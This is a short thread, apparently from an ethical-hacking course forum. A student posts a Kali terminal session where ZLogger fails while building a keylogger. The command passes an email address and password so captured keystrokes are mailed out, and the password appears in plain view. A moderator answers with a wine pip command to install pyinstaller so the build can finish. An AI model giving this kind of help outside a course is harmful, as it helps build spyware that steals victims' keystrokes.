Viewing 2 posts - 1 through 2 (of 2 total)
  • Author
    Posts
  • #44568
    bigfatdrugpig
    Participant

    hey mate how are you going?love your course your the best at explaining things to simple minded people like myself but away im geetin this error when trying to generate a keylogger can you help me

    root@kali:~# cd /opt/ZLogger/
    root@kali:/opt/ZLogger# ls
    install.sh keylogger keylogger.py LICENSE python-2.7.14.msi python-2.7.14.msi.1 README.md zlogger.py
    root@kali:/opt/ZLogger# python zlogger.py -i 60 -w -e [email protected] -p Longbeach36 -o keylogger
    wine: cannot find ‘/root/.wine/drive_c/Python27/Scripts/pyinstaller.exe’

    #44648
    Diego PérezDiego Pérez
    Moderator

    Hi!
    Can you try to install pyinstaller manually:

    wine /root/.wine/drive_c/Python27/python.exe -m pip install pytinstaller==3.5

    Then generate the keylogger.

    Let me know how it goes!
    Diego

Viewing 2 posts - 1 through 2 (of 2 total)
  • You must be logged in to reply to this topic.